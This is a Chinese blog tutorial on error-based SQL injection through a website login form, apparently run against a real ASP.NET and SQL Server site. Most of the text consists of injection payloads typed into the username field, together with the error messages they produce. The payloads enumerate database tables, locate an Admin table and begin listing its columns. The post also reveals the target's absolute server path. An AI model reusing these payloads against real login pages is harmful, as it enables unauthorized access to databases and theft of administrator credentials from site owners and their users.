登陆框post注入教程-白红宇

登陆框post注入教程

阅读量：6345 次

发布时间：2019-06-22

本文共 3126 字，大约阅读时间需要 10 分钟。

登陆框post注入

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U')) and '1'='1

爆出网站的绝对路径：E:\wwwroot\NewXs\web\List.aspx

大家也可以从url中注入，不过我直接从登录口突破。

Copyright ? 2009-2010 普法管理

Server Error in '/' Application.

在应使用条件的上下文(在 'or' 附近)中指定了非布尔类型的表达式。

出现这个说明存在注入漏洞，因为已经将刚才的万能密码带入sql语句进行查询了。

1234567890 10个字符

刚才我写'1 and '1' ='1 写不进去，因为它限制了我的输入，只能输入10个字符。

那我换条路子走。

申报管理后台帮助.html

“/kjj”应用程序中的服务器错误。

哈哈，报错了，我喜欢报错。。

在将 nvarchar 值 'sysdiagrams' 转换成数据类型 int 时失败。

这句话什么意思呢？我们刚才在用户名的那个文本框写的是：

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U')) and '1'='1

那么它是查询第一个用户表的名字，并且转化成Int类型，因为表名是nvarchar类型的，所以会报错。

sysdiagrams

但这个表名貌似对我们没什么太大的作用，我们先看看第2个表。

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in('sysdiagrams'))) and '1'='1

Commonness

我们继续看第三个表：

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in('sysdiagrams','Commonness'))) and '1'='1

Bargain

以此类推，我找了半天，才找到一个有用的表：

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('sysdiagrams','Commonness','Bargain','ValidationReport','Examine','OpinionBook'))) and '1'='1

ProjectInformation

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('sysdiagrams','Commonness','Bargain','ValidationReport','Examine','OpinionBook','ProjectInformation'))) and '1'='1

Company

yinfu

NewsType

AdminType

Admin

=======================================================
有个Admin表，那么我开始猜列：

1' and 1=convert(int,(select top 1 col_name(object_id ('Admin'),1) from Admin)) and '1'='1

然后我们猜第二个，第三个：

1' and 1=convert(int,(select top 1 col_name(object_id ('Admin'),2) from Admin)) and '1'='1

LoginName